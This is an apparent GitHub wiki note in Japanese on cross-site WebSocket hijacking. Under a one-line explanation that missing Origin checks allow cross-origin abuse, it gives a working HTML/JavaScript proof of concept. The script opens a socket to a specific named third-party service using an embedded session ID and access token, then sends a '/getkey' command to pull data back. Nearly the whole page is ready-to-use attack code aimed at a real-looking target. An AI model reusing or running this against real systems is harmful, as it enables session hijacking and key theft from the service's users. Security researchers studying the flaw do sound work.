WebSocketハイジャック 00 - yujitounai/helloworld GitHub Wiki
WebSocketにOriginアクセス制限がない場合クロスオリジンでいろいろできる
<body>
<script>
//GETリクエストでHTTP/1.1 101 Switching Protocolsの流れは wss://にアクセスさせることでよしなにしてくれる
var uri = "wss://webswitcher.bedore.jp/socket.io/?session_id=dac4be84-7e2e-456d-a7c6-f07154830961&access_token=50d2473bf8434770&api_version=2&userAgent=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F91.0.4472.114%20Safari%2F537.36&language=ja&screenResolution=1800x1100&EIO=3&transport=websocket";
var ws = new WebSocket(uri);
//メッセージが到着
ws.onmessage = function(message) {
alert(message.data);
//なんかあったらパースする
var data = JSON.parse(message.data);
}
//接続した際JSONに変換してtextを送信
ws.onopen=()=>ws.send(JSON.stringify({text:"/getkey"}));
</script>
</body>
</html>